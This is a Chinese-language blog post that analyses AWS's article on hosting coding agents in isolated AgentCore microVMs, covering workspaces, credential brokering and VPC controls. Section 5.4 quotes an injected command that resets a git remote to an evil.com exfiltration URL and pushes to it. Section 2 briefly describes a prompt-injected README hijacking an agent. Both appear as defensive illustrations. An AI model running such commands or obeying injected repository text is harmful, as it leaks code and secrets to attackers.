现在可以合上笔记本了:深度解读 AWS 在 AgentCore 上托管 Coding Agent

⏱ 约 36 分钟阅读
现在可以合上笔记本了:深度解读 AWS 在 AgentCore 上托管 Coding Agent
合上笔记本,agent 在云端独立 microVM 里继续工作

解读对象 AWS ML Blog《It’s safe to close your laptop now: Hosting coding agents on Amazon Bedrock AgentCore》(2026-06-08,作者含 AgentCore 多位 PM/首席工程师) 原文 https://aws.amazon.com/blogs/machine-learning/its-safe-to-close-your-laptop-now-hosting-coding-agents-on-amazon-bedrock-agentcore/


TL;DR(一句话核心)

这篇官方长文是 AgentCore「卖铲子」战略最锋利的一个刃口——它把抽象的「企业级 Agent 运行时」落到一个所有开发者都有切肤之痛的具体场景上:那台为了不让 coding agent 断掉而不敢合上的笔记本。AWS 的答案是:笔记本从来不是跑 agent 的「对」机器,只是「最近」的那台;把 agent 搬进云端独立 microVM,再用 Identity / Gateway / VPC 这套企业级外围系统把凭证、网络、可观测全部接管,于是——盖子终于可以合上了。真正的杀招不是「上云跑 agent」,而是物理隔离 + 凭证外置 + VPC 网络管控这三件套,恰好是各类本地 harness(Claude Code、Devin、OpenClaw 等)最难自建的部分。


一、一个扎心的开场:那台「合不上的笔记本」

文章开篇没有讲技术,而是描绘了一个 2026 年真实在发生、且很多人有共鸣的画面(作者还引用了 Business Insider 的专题报道):

开发者跑着 coding agent(Claude Code、Codex、Kiro、OpenCode、Gemini CLI、Cursor CLI,或自己拼的 harness),却不敢合上笔记本——

  • 从一个会议走到下一个会议,笔记本半开着抱在怀里
  • 1:1 谈话时把盖子撑开一条缝,只为让屏幕别灭
  • 骑车回家路上得托着笔记本,因为它必须保持运行

为什么?因为「合上放桌上」=「杀死正在里面跑的 agent」。

作者一针见血点透本质:

任何 coding agent 剥到底,都只需要同样五样东西:一个 shell、一个文件系统、checkout 好的项目、装好的依赖、对的权限(操作文件系统的权限 + 访问网络和外部世界的凭证)。你的笔记本碰巧这五样都有。但这份清单里没有任何一项写着「必须是笔记本」。笔记本拿到这份工作,是因为它是最近的那台机器,不是最对的那台。

这个 framing 极其高明——它把一个看似「云托管 vs 本地」的技术选型问题,重构成了「你为什么还在用错误的工具」的认知问题。


二、为什么笔记本是错误的宿主(四条,条条戳痛)

文章用四条理由论证「笔记本从一开始就不该是 agent 的宿主」:

1. 你的笔记本就是「受灾半径」本身 Agent 共享你的 shell、文件系统、token、VPN、已加载的 SSH key。一个被 prompt 注入的 README,就是一个太多的被注入 README——爆炸半径直接等于你整台机器。

2. 密钥就躺在 agent 正在改的代码旁边 .env 文件、~/.aws/credentials~/.ssh/id_ed25519、那个带私有 registry token 的 ~/.npmrc——全都和 agent 运行的同一个 shell 触手可及。最小权限原则在这里形同虚设。

3. git worktree 只是并行的「半个补丁」 跑两个 agent 的标准玩法是为两个分支开 worktree、各指一个 agent。Agent 自己也做了部分隔离(Codex 默认沙箱到工作目录,Claude Code 默认只读)。但它们共享同一台机器,而机器正是它们相撞的地方:同一个 localhost:5432 的 Postgres、同一个 dev server 要的 :3000、同一个 SSH keyring、同一个出口 IP、同一个 ~/.aws/credentials。三个 agent 跑三个分支,本质是三个进程抢一台主机。并行的诚实答案不是再开一个 worktree,而是每个 agent 一台专属机器。

4. 笔记本盖子就是物理 kill switch 挂起笔记本,agent 跟着挂起。为开会合盖,丢了 session;为坐飞机合盖,丢了整个 workspace——半装好的依赖、改了一半的重构、还在跑的测试套件,全随盖子消失。任务越长越要命:90 分钟的重构、通宵的迁移,意味着盖子必须开 90 分钟、开一整夜。

作者金句:「发布一个功能,不该取决于笔记本铰链张开的角度。」


三、开发者要什么 / 平台团队要什么

文章很聪明地把需求拆成两个视角,因为这恰好是 AgentCore 要同时讨好的两类人:

如果你是开发者:你想要「笔记本的体验,但没有笔记本的限制」——同一个 agent、同一个 shell、同一个文件系统、同样的即时反馈,但盖子可以合上、多个 agent 可以并排跑、工作能扛过重启 / 航班 / 一顿长午餐。

如果你在平台团队:你想要你一直想要的那些东西——每个 agent 有自己的 scope;流量走你的 VPC 而不是公网;身份绑公司 IdP 而不是 .env;每次调用有 CloudTrail 记录;每一步有 CloudWatch trace;工具访问由策略层中介而不是 ~/.netrc;凭证不落在 LLM 控制的环境的磁盘上。这些都不该是可选项,也都不该需要自己从头建。

AgentCore 的卖点就是:这两边它都给你。


四、解法核心:把「笔记本体验」搬上云,去掉笔记本的命门

4.1 Runtime —— 每个 session 一台独立 Firecracker microVM

  • 每个 session 拿到一个专属环境:隔离的 Linux microVM + 持久 workspace + 真 shell + 确定性命令执行
  • 大多数 sandbox 产品也能做到类似的隔离——但 AgentCore 开箱即给的是周边那一整套系统(Identity / Gateway / Observability),这才是难组装的部分
  • 三个 agent 跑同一个 ticket,三个独立内核、三套独立文件系统,没有 localhost:5432 冲突
  • 计费:不用预选 CPU/内存规格,按实际 CPU 消耗(I/O wait 不额外收费)+ 滚动峰值内存计费;单 microVM 最长 8 小时,最短 1 分钟

4.2 四个把「托管容器」变成「真开发环境」的能力

这是本文相对昨天那份 AgentCore 总览研究最值得补充的新料

① 持久的 /mnt/workspace(Managed session storage,public preview)

  • 给每个 session 一个零配置的持久目录,agent 写的文件下次还在
  • node_modules.git、build 缓存、项目文件、改了一半的重构——全部以 agent 离开时的精确状态保留
  • microVM idle 掉之后文件系统仍在,14 天不活动才清理;重连同一 session ID,一个新 microVM 在毫秒级挂回同一文件系统
  • 配置就一段(无需手写 S3 同步 / SIGTERM flush / git bundle 持久化):
client.create_agent_runtime(
    agentRuntimeName="acme-coding-agent",
    agentRuntimeArtifact={"containerConfiguration": {"containerUri": "..."}},
    filesystemConfigurations=[
        {"sessionStorage": {"mountPath": "/mnt/workspace"}}
    ],
    roleArn="arn:aws:iam::...:role/AgentExecutionRole",
)

关键差异:笔记本上你靠 git worktree逻辑隔离;AgentCore 上是物理隔离——每个 agent/session 指向独立 microVM、独立 /mnt/workspace,git 仍作协调层,但额外白送独立 build 缓存、独立 node_modules、独立文件系统状态,无需 worktree 管理。

② 真正的交互式 shell(2026-06-05 上线)

  • agentcore exec --it 直接开一个 PTY-backed shell 进运行中的 microVM
  • 颜色、Tab 补全、Ctrl+C、终端 resize、断线重连全部内建——远程环境用起来像本地终端
  • 真正有意思的是开多个:开三个终端各连一个 microVM,看三个 agent 并行干三个分支。「后台」不再是你的笔记本,而是一队远程隔离环境,各有自己的内核
  • 连接「不金贵」:合上笔记本,明天打开重连同一个 shell。每个交互会话有两个关键 ID——runtime session ID(哪个 microVM)和 shell ID(microVM 里的哪个 shell),两个都传回 agentcore exec --it 就回到同一个 shell、同一个工作目录、同一段 scrollback,无需重启、无需重新 clone
# 进入 agent 的 VM
agentcore exec --it --runtime acme-coding-agent --session-id sess-jane-1234

# 稍后重连同一个 shell
agentcore exec --it --session-id sess-jane-1234 --shell-id shell-789

③ 应用层的确定性命令执行

  • 终端不是驱动环境的唯一方式。任何能在 agentcore exec --it shell 里跑的命令,你的应用也能直接跑,中间不放 LLM
  • 当操作本身已是确定性的(跑测试套件、push 分支、装依赖、拉数据集),可以完全跳过模型:InvokeAgentRuntimeCommand 把 shell 命令直送 agent 正在工作的那个 microVM,stdout/stderr 经 HTTP/2 流式回传
  • 价值:不烧 token、不存在「push 到底发生没有」的概率性判断;agent 一秒前写的文件,命令立刻可见
# 一次性、非交互
agentcore exec --runtime acme-coding-agent --session-id sess-jane-1234 \
  "cd /mnt/workspace && npm test"

④ Bring-your-own 文件系统(跨 session 共享)

  • Managed session storage 管「每 session 持久化」;跨 session/跨 agent 共享的数据(团队的 Skills 库、共享依赖缓存、上一条 pipeline 的 golden artifacts),可把 S3 Files 或 EFS access point 挂成每个 session 里的 POSIX 目录
  • 每个 runtime 最多 5 个挂载,无需 sidecar / mount helper / /etc/fstab
  • 把一个 Skill 丢进 S3 Files,团队每个 agent 下次调用就在 /mnt/skills 自动拿到
filesystemConfigurations=[
    {"sessionStorage": {"mountPath": "/mnt/workspace"}},
    {"s3FilesAccessPoint": {"accessPointArn": "...", "mountPath": "/mnt/skills"}},
    {"efsAccessPoint": {"accessPointArn": "...", "mountPath": "/mnt/cache"}},
]

五、工具与凭证的「安全姿势」:Identity + Gateway

一个只能编辑文件的 coding agent 用不了多久——迟早要开 PR、评论 Jira、push 私有 registry、在 Slack 上 page 人。

错误做法:把 GitHub 凭证(或任何 access token)塞进 microVM 里的 ~/.netrc,祈祷没人问起。 正确做法根本不要把它放进去。

5.1 Gateway 持工具目录,Identity 持凭证

  • AgentCore Gateway 是工具目录所在地,Identity 持有背后的凭证:长期 secret 在 AWS Secrets Manager,短期 token 缓存在 Identity 的 Token Vault
  • 你把 coding agent 需要的工具(GitHub、Jira、Slack、build 系统、自家 OpenAPI / Lambda 服务)注册一次,Gateway 暴露单一 MCP 端点,说的是 Claude Code / Codex / Cursor / Kiro / OpenCode 已经在用的 Streamable HTTP transport
  • 把 Gateway 接进 harness 只需一行 MCP 配置,无需手动铸 bearer header、无需粘贴 token:
# Claude Code
claude mcp add agentcore \
  https://<gateway-id>.gateway.bedrock-agentcore.us-west-2.amazonaws.com/mcp \
  --transport http

5.2 三种凭证模式覆盖大多数编码工作流

模式 适用场景 凭证机制 归属
bot 模式 agent 以自己身份行动 建 GitHub bot,铸细粒度 PAT 限定到指定 repo,作为 API-key 凭证注册到 Gateway 的 GitHub MCP target;Identity 把 PAT 锁在 Token Vault,Gateway 每次调用附上 GitHub 看到的 actor 是 bot
on-behalf-of 模式 agent 代表某个人行动 开发者经 IdP 登录,Identity 铸 workload access token 并用 OAuth 2.0 Token Exchange(RFC 8693)换成 GitHub-scoped token,缓存在 Token Vault PR 归属真人,不是共享 bot;同样适用 Jira/Slack/Salesforce/Confluence
broker 模式 要完全掌控凭证流(如 GitHub App 安装 token 需自签 JWT,或下游服务不与 IdP 联邦) Gateway target 指向一个 Lambda,Lambda 每次调用铸/取凭证、代理请求、密钥永不回传 agent 同等安全属性,兼容遗留与非标准认证

5.3 一个容易被忽略的边角:GitHub MCP 不能 clone 私有库

GitHub MCP server 能 push 文件、评论、开 PR,做 agent session 中需要的一切——但它没有 clone 动词。首次拉取仍走 git,而 git 需要 session 里有一个凭证。官方建议把这个凭证收窄:用一个只读 contents、限定到允许 repo 的细粒度 PAT,或绑单 repo 的 deploy key;存进 Secrets Manager(背后是 Identity credential provider),session 启动时由 runtime 经 Identity 取值,用一次做 git clone,之后所有 GitHub 动作都走 Gateway。可配 Secrets Manager 按安全团队要求的节奏轮换、随时在 GitHub 端吊销。

5.4 真正的护城河:VPC 网络管控

agent 实际做的大多数事不是 MCP 工具调用,而是 npm installgit clonecargo buildpip install——直接和互联网对话的 shell 命令。Gateway 看不到这些流量,但底层网络看得到。Agent 跑在你的 VPC 里,意味着你来定义「互联网」从 microVM 内部看起来是什么样

  • 包安装:agent 跑 pip install pandas,你的 Route 53 私有区把 pypi.org 解析到你的内部 PyPI 镜像(VPC 端点后),或者干脆不解析,逼 agent 用你的 CodeArtifact registry。你没告诉 agent 用哪个 registry——你只是让它视角里只存在那一个
  • Git 操作:agent 跑 git push origin main,你的安全组只放行出站 443 到 GitHub Enterprise 的 IP 段。被注入的 git remote set-url origin https://evil.com/exfil.git && git push 在 TCP 层就失败——SYN 包根本出不了子网
  • 构建工具链:多阶段 build 从六个 registry 拉东西,你的 NAT gateway 弹性 IP 是唯一出路,前面坐着 Network Firewall 域名白名单。build 照常工作,但只对你允许的域名

这一段是全文最该被企业架构师反复读的部分:失败发生在网络层而非应用层——这是「防御」和「祈祷」的本质区别,也是企业安全团队第一个会问的问题。


六、压轴实测:四个 Coding Agent 同台竞速

官方放出 companion GitHub repo,把后半篇变成三个可跑实验。每个都从同一步开始:你的应用对 AgentCore Runtime 每个 agent 调用一次,每次调用落进自己的 microVM,各自在项目的独立副本上工作。三个实验的区别在于「agent 跑起来后你拿它们做什么」:

实验 目标 做法
Race(谁最快修好) 评冠军 选一个 GitHub issue,同时丢给四个 agent,各跑自己的 microVM,修完各自经 Gateway 向 GitHub Enterprise 开 PR。四名选手:Claude Code、Codex CLI、Kiro CLI、Cursor CLI,可任意替换
Bench(谁修得最好) 不评冠军,评分 同样设置,但脚本给每个人打分:把延迟 / 美元成本 / 测试一次通过率逐次写进 CSV。要跑多少个 模型×harness 组合都行。下次有人问「哪个模型最适合我们代码库」,只需重跑脚本
Watch(盯着 agent 干活) 旁观不打断 一个长跑重构 agent,2 小时无人值守。它干活时你本地开一个终端 agentcore exec --it 连同一个 session——你现在和 agent 在同一个 microVM 里。tail 日志、读 stack trace、往一个文件里塞条备注供 agent 下一步读。全程不进它的 loop

repo 里的默认对阵阵容很说明 AWS 的「模型中立」立场(连竞品模型都摆上台):

Agent 默认模型
Claude Code global.anthropic.claude-opus-4-8(Opus 4.8)
Codex openai.gpt-5.5(GPT-5.5)
Kiro auto(Kiro 自动选模型)
Hermes global.meta.llama4-maverick-17b-instruct-v1:0(Llama 4 Maverick)

实验里用的真实 issue 也很典型——一个 delete_task 里把 != 写成 == 的反向逻辑 bug(调用删除会删掉除目标外的所有任务),让四个 agent 各自读 issue #2、给出理想解法。

文章的收尾画面很有冲击力:「许多 tab、许多窗口,每一个接一个不同的 microVM。笔记本从『做工作的机器』变成了『帮你监督一队 agent 的机器』。」


七、客户实证(不只是 demo)

文章列了一串已在生产跑 agent 的客户,证明这不是 PPT:

  • Thomson Reuters CoCounsel:面向高风险法律工作流的 agentic AI,基于 Claude Agent SDK(跑和 Claude Code 同样的执行循环),托管在 AgentCore——拿到企业级所需的可扩展、安全执行基础设施
  • Cox Automotive:从零 agentic 经验到生产就绪只用一个月,现在跑 17 个 agent,受细粒度 Identity 权限管理,开发者专注业务逻辑而非基础设施
  • Druva DruAI:在 Runtime 上协调 8-10 个专门的网络安全 agent,Identity 把每个 agent(data/help/action)限定到各自后端权限
  • Iberdrola:IT 运维 agent 在 VPC 内跑 LangGraph workload,Runtime/Identity/Memory/MCP gateway 各司其职
  • Kollab:把团队 AI workspace 托管在 Runtime,靠 managed session storage 跨暂停保持各 session 工作目录
  • Thomson Reuters 平台工程团队:在 AgentCore 上建 agentic hub 自动化云账号开通、数据库打补丁、架构审查,首发即报告 15x 生产力提升

作者点题:不同问题域,同一套平台收益——这些实现模式并不限于 coding agent。


八、深度判断(超出文章本身的解读)

8.1 这篇是 AgentCore 战略的「具象化弹药」

在我们昨天那份 AgentCore 全景研究里,核心结论是「AgentCore 本质是卖铲子 / Agent 时代的 Lambda」。这篇博客就是那把铲子最锋利的一个刃口——coding agent 托管。它精准卡在当下最热、开发者最有体感的场景:

  • 传播力极强:「合上笔记本」这个 meta 叙事自带病毒性。它不讲参数、不讲架构图,讲一个所有人都见过的尴尬画面,然后给一个干净的解法。这是顶级的开发者营销
  • 场景选得刁:coding agent 是 2026 年 agent 落地最成熟、付费意愿最强的品类。AWS 不去碰还在 PoC 的虚场景,直接打已经在烧钱的真场景

8.2 真正的杀招是「三件套」,不是「上云跑 agent」

市面上能给你 microVM 的 sandbox 产品不少(E2B、Modal、Daytona 等)。AgentCore 的差异化不在隔离本身,而在它开箱即给的企业级外围系统:

  1. 物理隔离(Firecracker microVM,每 session 独立内核/文件系统)
  2. 凭证外置(Identity Token Vault + 三种凭证模式,token 永不落进 LLM 控制的环境)
  3. VPC 网络管控(在网络层而非应用层杀掉数据外泄,包/git/build 流量全可管控)

这三件套恰好是各类本地 harness 和创业 sandbox 最难自建的部分——隔离好做,但「凭证安全 + 网络合规 + 可审计」这套企业信任基础设施,是 AWS 几十年积累的护城河。

8.3 对我们团队的直接启示

这篇文章里有一段几乎是在描述我们团队正在做的事

「Sub-agent 继承父级同样的 MCP 配置和环境变量,在自己的 context 里运行,完成后把结果返回主线程。你可以让它们前台运行(想看时)或推到后台(不想看时),还能把某个 MCP server(或其中某个具体工具)限定给单个 sub-agent,让它的爆炸半径匹配它的职责。」

这和我们「小帅 + 五岳」的多 agent 协调架构(主线程 spawn subagent、独立 context、可前台/后台、单向通信)高度同构。区别在于:

  • 我们:本地 spawn subagent,共享宿主环境
  • AgentCore:每个 sub-agent 一个独立 microVM,物理隔离 + 凭证外置 + 可审计

这意味着 AgentCore 把我们这套「虚拟公司 / 多 agent 编排」模式做成了 AWS 托管商品。 值得持续盯的两个点:

  1. Managed session storage(持久 /mnt/workspace + 14 天保留)——对长任务、跨天累积状态的编排极有借鉴价值
  2. InvokeAgentRuntimeCommand 确定性命令执行——「确定性操作绕过 LLM 直接发命令」这个设计,对我们降低 token 消耗、提高编排可靠性是个好范式

8.4 该用 / 不该用的边界

该用:已在 AWS 生态、要把 coding agent 推上生产、有合规/审计/隔离硬要求(金融、法律、医疗——Thomson Reuters 即是)、需要长任务和大规模并行 agent 的团队。

慎用 / 不该用:强多云诉求、极致成本敏感的个人开发者(本地跑或轻量 sandbox 更省)、对延迟极敏感的轻量任务。对个人开发者而言,「合上笔记本」的痛点真实,但月度成本和配置复杂度要算清账。


九、一句话总结

这篇博客用「合上笔记本」这个全开发者共鸣的画面,把 AgentCore 的企业级价值讲成了一个谁都听得懂的故事。它的真正主张不是「把 agent 搬上云」——而是「coding agent 早该有一个真正为它设计的宿主系统,而不是借用一台碰巧在手边的笔记本」。AWS 赌的是:当 agent 从玩具变成生产力工具,那个宿主系统的标准,会是它的。


信息源

  • AWS ML Blog 原文(2026-06-08):https://aws.amazon.com/blogs/machine-learning/its-safe-to-close-your-laptop-now-hosting-coding-agents-on-amazon-bedrock-agentcore/
  • AgentCore Runtime 文档:https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/agents-tools-runtime.html
  • AgentCore Gateway 文档:https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/gateway.html
  • AgentCore Identity 文档:https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/identity.html
  • AgentCore Observability 文档:https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/observability-configure.html
  • 配套实验 GitHub repo(原文末尾链接)
  • Business Insider「开发者公共场合不合笔记本」报道(2026-05)
  • 延伸阅读:《Amazon Bedrock AgentCore 全景深度研究》 https://wujiaming88.github.io/2026/06/11/amazon-bedrock-agentcore.html

📖 相关阅读

上一篇
Amazon Bedrock AgentCore 全景深度研究:AWS 押注 Agent 时代的「水电煤」底座
下一篇
AgentCore Harness 深度研究:AWS 把「编排层」也吃进了托管底座
喜欢这些内容?📡 订阅 RSS 获取更新。
🔍
💡 输入关键词搜索文章
支持中文分词,搜索标题、内容、标签